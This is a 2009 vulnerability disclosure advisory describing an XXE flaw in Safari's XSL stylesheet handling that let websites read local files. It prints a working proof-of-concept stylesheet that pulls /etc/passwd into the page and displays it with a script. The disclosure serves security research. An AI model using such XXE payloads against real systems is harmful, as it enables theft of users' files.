CESA-2009-006 - rev 1


[See all my vulnerabilities at http://scary.beasts.org/security]

[Blog if you want to subscribe to new findings is at http://scarybeastsecurity.blogspot.com/]

Apple Safari local file theft bug



Programs affected: Safari prior to version 4
Severity: Websites can steal files from the victim's computer
Vendor URL (copy): APPLE-SA-2009-06-08-1
Initial report: Jun 2008

Safari was vulnerable to an XXE attack against a relatively obscure area of XML parsing. As a recap, XXE (Xml eXternal Entity) attacks abuse a built-in feature of XML to fetch files (or network resources) and embed them in an attacker's document. XXE attacks are most common server-side; this advisory notes a client-side attack against the Safari browser.

Safari's XSL stysheets were vulnerable to XXE attacks. By having a random XML file refer to an evil XSL resource (which is itself an XML-based format), the attacker can steal a local file by refering to it in the XSL resource's DTD.

Here's the code for the evil DTD:

<!DOCTYPE doc [ <!ENTITY ent SYSTEM "file:///etc/passwd"> ] >
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
  <html>
  <body>
Below you should see the content of a local file, stolen by this evil web page.
<p/>
&ent;
<script>
alert(document.body.innerHTML);
</script>
  </body>
  </html>
</xsl:template>
</xsl:stylesheet>

Demos

Click here for Safari 3 / MacOS

Click here for Safari 3 / Windows

Credits


CESA-2009-006 - rev 1
Chris Evans
scarybeasts@gmail.com